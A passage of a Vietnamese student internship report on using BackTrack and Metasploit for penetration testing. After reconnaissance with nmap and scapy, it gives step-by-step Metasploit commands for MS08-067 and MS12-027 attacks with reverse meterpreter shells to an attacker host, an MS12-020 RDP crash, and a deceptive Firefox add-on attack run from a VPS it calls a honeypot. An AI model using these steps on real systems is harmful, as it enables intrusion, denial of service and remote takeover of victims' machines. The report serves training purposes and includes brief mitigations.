33
Đề tài: Nghiên cu và sdng BackTrack để kim tra an ninh mng GVHD: Võ Đỗ Thng Trang | i SVTH: Nguyễn Văn Tiến TRÍCH YU Hin nay trong thời đại công nghthông tin vấn đề an toàn và bo mt thông tin ca mi cá nhân, doanh nghiệp, cơ quan, tổ chức … được quan tâm hàng đầu. Do vic nhu cầu trao đổi thông tin gia các cá nhân, tchức … ngày càng cao vì vy vấn đề bo mt là rt cn thiết. Nếu an ninh mng không được quan tâm đúng mức scó nhiu vấn đề nghiêm trng xảy ra như xâm nhập bt hợp pháp, đánh cấp dliu, tn công, lừa đảo… Một trong những cách để hn chế nhng vấn đề đó là luôn kiểm tra hthống, cài đặt phn mm có license, cài đặt các bản vá… Trong thi gian thc tp 8 tun tngày 12/05/2014 đến ngày 05/07/2014 tôi đã hoàn thành đồ án “ Nghiên cu và sdụng Backtrack để kim tra an ninh mng. Quá trình thc tp giúp tôi hiểu được vcông vic ca những người kim tra hthng mng và tôi có thvn dng nhng kiến thức đã được hc vào thc tế. Bên cạnh đó, tôi học hỏi được nhiu thtrong cuc sng tcác bn thc tập chung và đặt bit bit là thầy Võ Đỗ Thng. Tôi cam kết kết qucủa đồ án là do tôi thc hiện dưới shướng dn ca thầy Võ Đỗ Thắng(Giám đốc Trung tâm đào tạo Qun trmng và an ninh mng Quc tế Athena) không sao chép của người khác. Các bước ca quá trình thc hiện được ghi li bng những đoạn phim ngn và có thuyết minh. Danh sách các đoạn phim: Cài đặt Backtrack 5R3 https://www.youtube.com/watch?v=etNV0jf7sFk Các công cthu thp thông tin: https://www.youtube.com/watch?v=CePaGIHRhog Khai thác lhng MS08_067: https://www.youtube.com/watch?v=t0t8A0OPtoU Khai thác lhng MS12_020: https://www.youtube.com/watch?v=ZArVYCUj9BU Khai thác lhng MS12_027: https://www.youtube.com/watch?v=yLHvLe-olOM Cài Metasploit trên VPS: https://www.youtube.com/watch?v=YMqkg3duLQ8 Khai thác lhng ca firefox_xpi_bootstrapped qua mng internet có sdng backdoor: https://www.youtube.com/watch?v=4oNY9pUmeb0

Báo cáo cuối kỳ

Embed Size (px)

Citation preview

Page 1: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | i SVTH: Nguyễn Văn Tiến

TRÍCH YẾU

Hiện nay trong thời đại công nghệ thông tin vấn đề an toàn và bảo mật

thông tin của mọi cá nhân, doanh nghiệp, cơ quan, tổ chức … được quan tâm

hàng đầu. Do việc nhu cầu trao đổi thông tin giữa các cá nhân, tổ chức … ngày

càng cao vì vậy vấn đề bảo mật là rất cần thiết. Nếu an ninh mạng không được

quan tâm đúng mức sẽ có nhiều vấn đề nghiêm trọng xảy ra như xâm nhập bất

hợp pháp, đánh cấp dữ liệu, tấn công, lừa đảo… Một trong những cách để hạn

chế những vấn đề đó là luôn kiểm tra hệ thống, cài đặt phần mềm có license, cài

đặt các bản vá…

Trong thời gian thực tập 8 tuần từ ngày 12/05/2014 đến ngày 05/07/2014

tôi đã hoàn thành đồ án “ Nghiên cứu và sử dụng Backtrack để kiểm tra an ninh

mạng”. Quá trình thực tập giúp tôi hiểu được về công việc của những người

kiểm tra hệ thống mạng và tôi có thể vận dụng những kiến thức đã được học vào

thực tế. Bên cạnh đó, tôi học hỏi được nhiều thứ trong cuộc sống từ các bạn thực

tập chung và đặt biệt biệt là thầy Võ Đỗ Thắng.

Tôi cam kết kết quả của đồ án là do tôi thực hiện dưới sự hướng dẫn của

thầy Võ Đỗ Thắng(Giám đốc Trung tâm đào tạo Quản trị mạng và an ninh mạng

Quốc tế Athena) không sao chép của người khác. Các bước của quá trình thực

hiện được ghi lại bằng những đoạn phim ngắn và có thuyết minh.

Danh sách các đoạn phim:

Cài đặt Backtrack 5R3

https://www.youtube.com/watch?v=etNV0jf7sFk

Các công cụ thu thập thông tin:

https://www.youtube.com/watch?v=CePaGIHRhog

Khai thác lổ hỏng MS08_067:

https://www.youtube.com/watch?v=t0t8A0OPtoU

Khai thác lổ hỏng MS12_020:

https://www.youtube.com/watch?v=ZArVYCUj9BU

Khai thác lổ hỏng MS12_027:

https://www.youtube.com/watch?v=yLHvLe-olOM

Cài Metasploit trên VPS:

https://www.youtube.com/watch?v=YMqkg3duLQ8

Khai thác lỗ hỏng của firefox_xpi_bootstrapped qua mạng internet có sử

dụng backdoor:

https://www.youtube.com/watch?v=4oNY9pUmeb0

Page 2: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | ii SVTH: Nguyễn Văn Tiến

MỤC LỤC

Chương Mở Đầu: GIỚI THIỆU VỀ BACKTRACK ......................................... 1

I. Giới thiệu ................................................................................................. 1

II. Cài đặt ...................................................................................................... 1

Chương 1: THU THẬP THÔNG TIN VÀ KHAI THÁC LỖ HỎNG CỦA HỆ

ĐIỀU HÀNH WINDOWS TRONG MẠNG LAN ......................................................... 4

I. Giới thiệu ................................................................................................. 4

II. Thu thập thông tin .................................................................................... 5

1. Liệt kê dịch vụ ...................................................................................... 5

2. Xác định phạm vi mạng ........................................................................ 5

3. Xác định host có đang mở hay không .................................................. 6

4. Các dịch vụ ........................................................................................... 6

5. Xác đinh hệ điều hành .......................................................................... 6

6. Nhận diện các dịch vụ .......................................................................... 7

7. Đánh giá các mối đe dọa ...................................................................... 7

III. Khai thác lỗ hỏng qua mạng Lan ............................................................. 8

1. Khai thác lỗ hỏng MS08_067 ............................................................... 8

2. Khai thác lỗ hỏng MS12_020 ............................................................. 11

3. Khai thác lỗ hỏng MS12_027 ............................................................. 13

Chương 2: XÂY DỰNG HONEYPOT ĐỂ XÂM NHẬP QUA MẠNG

INTERNET 17

I. Giới thiệu về Honeypot .......................................................................... 17

II. Xâm nhập qua mạng internet bằng Honeypot ....................................... 17

1. Cài đặt Metasploit trên VPS ............................................................... 17

2. Khai thác qua mạng internet ............................................................... 21

3. Backdoor............................................................................................. 23

Page 3: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | iii SVTH: Nguyễn Văn Tiến

Lời Cảm Ơn

Khoa Công Nghệ Thông Tin và Truyền Thông

Trường Đại học Cần Thơ

Em xin chân thành cảm ơn Khoa Công nghệ thông tin và Truyền thông trường Đại học

Cần Thơ đã tạo điều kiện cho em hoàn thành tốt đợt thực tập thực tế này. Trong đợt

thực tập này đã giúp em có nhiều kinh nghiệm thực tế trong học tập và cuộc sống.

Những kinh nghiệm đó sẽ giúp em hiểu rõ và định hướng cho công việc sau này.

Bên cạnh đó, em xin cảm ơn các Thầy Cô khoa CNTT&TT đã tận tình giảng dạy và

trang bị cho em những kiến thức cần thiết và hỗ trợ cho em hoàn thành đề tài này.

Trong quá trình thực tập thực tế đã hoàn thành nhưng không tránh khỏi những phần sai

sót. Vì vậy, em rất mong nhận được ý kiến chân thành của quý Thầy Cô để em hoàn

thiện hơn trong công việc và cuộc sống.

Em xin chân thành cảm ơn!

Tp Hồ Chí Minh, ngày 07 tháng 07 năm 2014

Sinh viên thực tập

Nguyễn Văn Tiến

Page 4: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | iv SVTH: Nguyễn Văn Tiến

Lời Cảm ơn

Trung Tâm Đào Tạo Quản Trị Mạng và

An Ninh Mạng Quốc tế ATHENA

Em xin chân thành cảm ơn Trung tâm đào tạo Quản trị mạng và An ninh mạng Quốc

tế Athena đã tạo điều kiện cho em thực tập thực tế nơi đây. Em đã nhận được sự hỗ trợ

nhiệt tình về cơ sở vật chất cũng như chuyên môn.

Em xin bày tỏ lòng biết ơn đến quý Thầy Cô của trung tâm,đặt biệt là thầy Võ Đỗ

Thắng đã chỉ dạy tận tình giúp em hoàn thành đề tài này.

Trong quá trình thực tập thực tế đã hoàn thành nhưng không tránh khỏi những phần sai

sót. Vì vậy, em rất mong nhận được ý kiến chân thành của quý Thầy Cô để em hoàn

thiện hơn trong công việc và cuộc sống.

Em xin chân thành cảm ơn!

Tp Hồ Chí Minh, ngày 07 tháng 07 năm 2014

Sinh viên thực tập

Nguyễn Văn Tiến

Page 5: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | v SVTH: Nguyễn Văn Tiến

Giáo viên hướng dẫn thầy Võ Đỗ Thắng(phải) và sinh viên thực tập Nguyễn Văn Tiến

Page 6: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | vi SVTH: Nguyễn Văn Tiến

NHẬN XÉT CỦA GIÁO VIÊN

---------oo0oo---------

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

.................................................................................................................................

Page 7: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | vii SVTH: Nguyễn Văn Tiến

GIỚI THIỆU TRUNG TÂM ATHENA

1. Giới thiệu

Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc

Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt

Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết

góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế

mũi nhọn, góp phần phát triển nước nhà .

2. Lĩnh vực hoạt động

Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên

sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của

các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó,

trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn

đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp,

các cơ quan chính phủ, tổ chức tài chính…

Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là

chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ

ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin

Truyền Thông các tỉnh, bưu điện các tỉnh,…

Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình

hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành

Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính

Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,...

3. Đội ngũ giảng viên

Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại

học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ

quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế

(Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều

kiện tham gia giảng dạy tại trung tâm ATHENA.

Page 8: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | viii SVTH: Nguyễn Văn Tiến

Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến

thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và

truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm

ATHENA.

4. Cơ sở vật chất

Thiết bị đầy đủ và hiện đại.

Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công

nghệ mới nhất.

Phòng máy rộng rãi, thoáng mát.

5. Dịch vụ

Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.

Giới thiệu việc làm cho mọi học viên.

Thực tập có lương cho học viên khá giỏi.

Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới

hạn thời gian.

Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính,

mạng máy tính, bảo mật mạng.

Hỗ trợ thi Chứng chỉ Quốc tế.

6. Liên hệ

Cơ sở 1: 92 Nguyễn Đình Chiểu, phường Đa Kao, Quận 1. Điện thoại: 090 78

79 477 - 094 323 00 99 - (08)38244041.

Cơ sở 2: 2 Bis Đinh Tiên Hoàng, phường Đa Kao, Quận 1. Điện thoại: 094 320

00 88 - (08)22 10 38 01.

Website: http://athena.edu.vn - http://athena.com.vn

E-mail : [email protected] - [email protected]

Page 9: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 1 SVTH: Nguyễn Văn Tiến

Chương Mở Đầu: GIỚI THIỆU VỀ BACKTRACK

I. Giới thiệu

Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để

thử nghiệm thâm nhập. Trong các định dạng Live DVD, bạn sử dụng có thể Backtrack

trực tiếp từ đĩa DVD mà không cần cài nó vào máy của bạn. Backtrack cũng có thể

được cài đặt vào ổ cứng và sử dụng như một hệ điều hành. Backtrack là sự hợp nhất

giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm -IWHAX,

WHOPPIX, và Auditor. Trong phiên bản hiện là Backtrack 5R3 được phát hành vào

tháng 8 năm 2012 bổ sung hơn 60 công cụ mới. Một số thay đổi đáng chú ý bao gồm

các công cụ thử nghiệm xâm nhập điện thoại di động, giao diện đồ họa cho công cụ

crack- wifi, một thể loại hoàn toàn mới là công cụ khai thác vật lý.

II. Cài đặt

Nếu chúng ta muốn sử dụng Backtrack mà không cần cài nó vào ổ cứng hay

Live DVD, chúng ta có thể ghi tập tin ảnh ISO vào đĩa DVD và khởi động máy tính

của bạn với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế của việc sử dụng

Backtrack là một DVD Live là nó là rất dễ dàng. Tuy nhiên, phương pháp này cũng có

một số nhược điểm. Backtrack có thể không làm việc với phần cứng và thay đổi cấu

hình nào được thực hiện trên phần cứng để làm việc sẽ không được lưu với đĩa DVD

Live. Ngoài ra, nó là chậm vì máy tính cần phải tải các chương trình từ đĩa DVD.

Cài đặt trong máy ảo. Điểm thuận lợi là chúng ta có thể dễ dàng sử dụng

Backtrack với hệ điều hành hiện tại. Khuyết điểm là tốc độ chậm, không dùng được

wireless trừ USB wireless.

Ở đây tôi cài Backtrack 5R3 trên máy ảo VMWare. Sau đây là một số hình ảnh khi cài

đặt Backtrack 5R3

Tạo máy ảo Backtrack

Page 10: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 2 SVTH: Nguyễn Văn Tiến

Đặt tên và chọn nơi lưu máy ảo.

Sau đó chúng ta hoàn thành các tùy chọn của máy ảo, tiếp theo chúng ta sẽ mở máy ảo lên.

Chọn chế độ boot “text mode” và đăng nhập vào Backtrack với username :root và password là toor. Gõ

“startx” để vào giao diện đồ họa .Sau đó chúng ta nhấn vào Install trên màn hình để cài đặt.

Page 11: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 3 SVTH: Nguyễn Văn Tiến

Sauk hi điền các thông tin về ngôn ngữ, múi giờ, bàn phím, phân vùng ổ cứng thì sau đó ta bấm vào nút

install để cài đặt

Giao diện của BackTrack sau khi cài đặt hoàn thành trên VMWare

Page 12: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 4 SVTH: Nguyễn Văn Tiến

Chương 1: THU THẬP THÔNG TIN VÀ KHAI THÁC LỖ HỎNG

CỦA HỆ ĐIỀU HÀNH WINDOWS TRONG MẠNG LAN

I. Giới thiệu

Đầu tiên hacker tiến hành thu thập thông tin về hạ tầng của mục tiêu, mô hình

của các Web Server, kiểu giao tiếp thông tin thông qua các cổng (port) nào, những site

liên quan đến việc thực hiện chức năng của site mục tiêu... Việc thu thập thông tin là

vấn đề quan trọng cho việc tấn công vào một hệ thống máy mục tiêu. Cho dù hacker

tấn công theo phương diện phần cứng hay qua ứng dụng thì việc thu thập vẫn là cần

thiết.

FootPrinting (In dấu ấn - thu thập thông tin): Là bước mà kẻ tấn công thâu tóm

càng nhiều thông tin càng tốt về đối tượng, người dùng, doanh nghiệp, các chi nhánh

của công ty, máy chủ… bao gồm các chi tiết: Domain Name, Địa chỉ IP, Networking

Prototcols…Đây là một bước quan trọng: Cho hacker nhiều thông tin, đôi khi với

những thông tin này hacker đã có thể làm chủ hệ thống. Sử dụng công cụ Nslookup,

SmartWhois…

Sanning (Quét thăm dò mạng): là quá trình tìm hiểu thông tin về các live host

trên mạng để giúp hacker quyết định kiểu tấn công nào vào hệ thống. Trong quá trình

Scanning hacker sẽ tìm hiểu thông tin về: địa chỉ IP, cổng, hệ điều hành, network, …

Enumeration (Điểm danh mạng - liệt kê tìm lỗ hổng): Đến đây, các hacker bắt

đầu kiểm soát server sơ bộ. Bước này là quá trình tập hợp và phân tích tên người dùng,

tên máy,tài nguyên chia sẽ và các dịch vụ. Sau đó tìm kiếm những tài nguyên được

bảo vệ kém, hoặc tài khoản người dùng mà có thể sử dụng để xâm nhập, bao gồm các

mật khẩu mặc định, các script và dịch vụ mặc định.

Page 13: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 5 SVTH: Nguyễn Văn Tiến

II. Thu thập thông tin

1. Liệt kê dịch vụ

Là tiến trình thu thập thông tin từ mạng, cho phép thu thập thông tin về tổ chức

như tên người dùng, tên máy tính, địa chỉ IP, mail server…

2. Xác định phạm vi mạng

Xác định phạm vi các địa chỉ IP từ mạng của mục tiêu

Sử dụng Dmitry để lấy thông tin từ mục tiêu, sử dụng –wnsp để tra cứu lấy tên

miền và quét cổng.

Page 14: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 6 SVTH: Nguyễn Văn Tiến

Sử dụng “scapy” để xác định traceroute.

Scapy : mở scapy

res,unans=traceroute(["www.athena.edu.vn"],dport=[80,443],maxttl=20): xác

định đường đi của gói tin đến Athena.edu.vn với port là 80 và 443, maxttl là 20.

res.graph() :hiển thị đường đi gói tin

3. Xác định host có đang mở hay không

Chúng ta có thể sử dụng lệnh ping đến mục tiêu.

Nmap –sP [ip đích] : -sP giúp xâm nhập mạng mục tiêu nhanh chóng, giúp cho

chúng ta biết host đó có up hay không. Tùy chọn sP sẽ gửi gói tin ICMP echo request

và 1 gói tin TCP ACK tới cổng 80.

4. Các dịch vụ

Để xem các dịch vụ nào đang mở trên đối tượng ta sử dụng

Nmap [địa chỉ ip đích]

Hay Nmap –p 1-1000 [địa chỉ ip đích] tìm port từ 1 đến 1000 có port nào đang

mở hay không.

Chúng ta cũng có thể scan 1 port nào đó nmap –p 80 [địa chỉ ip]

5. Xác đinh hệ điều hành

Chúng ta đã biết được địa chỉ IP , máy hoạt động, xác định được các cổng mở

của mục tiêu, bước tiếp theo là chúng ta xác định hệ điều hành nào đang chạy để cung

Page 15: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 7 SVTH: Nguyễn Văn Tiến

cấp cho quá trình khac thác lỗ hổng.

Nmap –O [địa chỉ IP]

6. Nhận diện các dịch vụ

Xác định các dịch vụ dựa trên các cổng đã nhận diện

7. Đánh giá các mối đe dọa

Backtrack sử dụng công cụ Metalgo, cung cấp thông tin tổng hợp từ bên trong

lẫn bên ngoài để có thông tin rõ ràng về mối de doa.

Page 16: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 8 SVTH: Nguyễn Văn Tiến

III. Khai thác lỗ hỏng qua mạng Lan

Đặc điểm chung của một hệ thống mạng là có nhiều người sử dụng chung

và phân tán về mặt địa lý nên việc bảo vệ tài nguyên (mất mát hoặc sử dụng không

hợp lệ) phức tạp hơn nhiều so với việc môi trường một máy tính đơn lẻ, hoặc một

người sử dụng. Hoạt động của người quản trị hệ thống mạng phải đảm bảo các thông

tin trên mạng là tin cậy và sử dụng đúng mục đích, đối tượng đồng thời đảm bảo mạng

hoạt động ổn định không bị tấn công bởi những kẻ phá hoại. Nhưng trên thực tế là

không một mạng nào đảm bảo là an toàn tuyệt đối, một hệ thống dù được bảo vệ chắc

chắn đến mức nào thì cũng có lúc bị vô hiệu hóa bởi những kẻ có ý đồ xấu.

1. Khai thác lỗ hỏng MS08_067

Khai thác trực tiếp lên dịch vụ, đây là dịch vụ chia sẽ file trên Windows được

mở mặc định(port 445), attacker có thể làm tràn bộ đệm và thực thi một mã lệnh từ xa.

Các hê điều hành bị ảnh hưởng : Windows 2000 sp4, Windows 2000 SP4, XP

Page 17: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 9 SVTH: Nguyễn Văn Tiến

SP2 và SP3, Server 2003 SP1 và SP2, Vista SP1…

Các bước thực hiện khai thác:

Chúng ta mở msfconsole lên.

Tiếp theo là chúng ta gõ: use exploit/windows/smb/ms08_067_netapi

Chúng ta show options để sem các tùy chọn của nó. Tiếp đó chúng ta set

RHOST (địa chỉ IP của máy nạn nhân) .

Page 18: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 10 SVTH: Nguyễn Văn Tiến

Chúng ta set payload windows/meterpreter/reverse_rtcp

Chúng ta set LHOST (địa chỉ IP của attacker).

Và show targets để xem các tuy chọn.

Page 19: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 11 SVTH: Nguyễn Văn Tiến

Chúng ta khai thác máy nạn nhân là winxp Sp3 nên tùy chọn là 5.

Và cuối cung là exploit để khai thác.

Và bây giờ chúng ya có thể xâm nhập vào máy win XP.

Cách phong tránh là tắt các cổng không sử dụng. Cập nhật các bản vá. Cài các

phần mềm có mua bản quyền.

2. Khai thác lỗ hỏng MS12_020

Do gửi các gói tin RDP đến đối tượng đích được khởi tạo không đúng cách

hoặc bị xóa, gây ra tình trạng máy tính bị lỗi màn hình xanh và khởi động lại.

Các hệ điều hành bị ảnh hưởng: Windows XP SP2 and SP3, Windows Server

Page 20: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 12 SVTH: Nguyễn Văn Tiến

2003 SP2, Windows Vista SP2, Windows Server 2008 …

Quá trình thực hiện:

Sử dụng lệnh: use auxiliary/dos/windows/rdp/ms12_020_maxchanelids

Tiếp theo ta gõ: “show options” để xem các tùy chọn

Chúng ta gõ: “set RHOST [địa chỉ IP máy nạn nhân]”

Cuối cùn là “run” để thưc hiện.

Chúng ta sẽ qua máy Win XP và thấy màn hình xanh

Page 21: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 13 SVTH: Nguyễn Văn Tiến

Bên máy attacker thì báo hệ thống đã bị đánh sập.

Cách phòng tránh là: cập nhật bản vá lỗi, tắt port 3389, cài chương trình diệt

virus…

3. Khai thác lỗ hỏng MS12_027

Lỗi do định dạng file trên office.

Các phần mềm bị ảnh hưởng :Office 2003 SP3, Office 2007 SP2, Office 2007

SP3, Office 2010 SP1...

Quá trình thực hiện: sử dụng Backtrack 5r3 làm attacker và 1 máy Win XP SP2

có cài Office 2007 làm victim.

Trên Metasploit console chúng ta gõ lệnh :

“use exploit/windows/fileformat/ms12_027_mscomctl_bof”

Page 22: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 14 SVTH: Nguyễn Văn Tiến

Đặt tên của file word tùy ý với phần mở rộng ”.doc”

Tiếp theo là “set payload windows/meterpreter/reverse_tcp”

Địa chỉ IP của attacker: “set LHOST [IP máy attack] và tiếp theo là exploit để

tao ra fileword có chứa mã độc.

Dùng lệnh cp để chuyển file này ra Desktop cho dễ dang sử dụng.

Ta copy file word đã được tạo vào đường dẫn /var/www/

Page 23: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 15 SVTH: Nguyễn Văn Tiến

Chúng ta start dich vụ web lên.

Tiếp theo chúng ta tạo ra 1 lắng nge: “ use exploit/multi/handler”

Và “ set payload windows/meterpreter/reverse_tcp”

“set LHOST [IP của attacker]”

Máy nạn nhân truy cập vào đường dẫn chứa file word và tải file đó về

Sauk hi tai về thì mở file đó lên

Page 24: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 16 SVTH: Nguyễn Văn Tiến

Chúng ta thấy trên máy attack có 1 sessions được tạo ra.

Attacker kết nối vào và thực hiên tấn công.

Page 25: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 17 SVTH: Nguyễn Văn Tiến

Chương 2: XÂY DỰNG HONEYPOT ĐỂ XÂM NHẬP QUA MẠNG

INTERNET

I. Giới thiệu về Honeypot

Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả

dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý của

chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ thống tài nguyên thông

tin có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là

Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp tương tác với

tin tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn công, công cụ tấn

công hay cách thức tiến hành thay vì bị tấn công. Với mục tiêu xây dựng Honeypot để

xâm nhập vào lỗ hổng hệ thống máy tính qua Internet, Hacker có thể sử dụng Máy chủ

ảo (VPS) và cài đặt Metasploit để trở thành Honeypot và giả dạng là một Web server

bình thường, từ đó đánh lừa máy nạn nhân khi một máy tính bất kỳ có kết nối Internet

truy cập vào địa chỉ mà hacker cung cấp.

II. Xâm nhập qua mạng internet bằng Honeypot

1. Cài đặt Metasploit trên VPS

Quá trình cài đặt Metasploit trên máy VPS: ở đây tôi sử dụng phiên bản

Metasploit 4.6.1. Yêu cầu đầu tiên là tắt các chương trình diệt virus và tường lửa.

Giao diện Welcome chúng ta chon “Next”

Page 26: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 18 SVTH: Nguyễn Văn Tiến

License Agreement chọn “ I accept the agreement” chọn “Next”

Tạo ra 1 thư mục metasploit trên ổ C:\, chọn Next

Page 27: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 19 SVTH: Nguyễn Văn Tiến

Ở đây Metasploit sử SSL port là 3790

Tạo ra 1 Webserver với server name “localhost” và ngày hết hạn 3650, chúng ta

cũng có thể thay đổi ngày hết hạn của nó.

Quá trình cài đặt đang diễn ra

Page 28: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 20 SVTH: Nguyễn Văn Tiến

Quá trình cài đặt đã hoàn tất.

Page 29: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 21 SVTH: Nguyễn Văn Tiến

2. Khai thác qua mạng internet

Dựa vào những lỗi trên trình duyệt người tấn công sử dụng phương pháp nào đó

làm cho các nạn nhân truy cập vào đường dẫn có chứa mã độc hay thực thi các mã độc

đó.

Tôi thưc hiện khai thác lỗ hỏng qua trình duyệt firefox dựa trên lỗi add on của

firefox: ta sử dụng máy WinXP có cài firefox(tất cả các phiên bản điều được) và VPS

đã được cài Metasploit (Honeypot):

Trên VPS chúng ta mở msfconsole :

“use exploit/multi/browser/firefox_xpi_bootstrapped_addon”

Page 30: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 22 SVTH: Nguyễn Văn Tiến

Tiếp theo là chúng ta đặt tên cho addon để nạn nhân tưởng đây là addon của

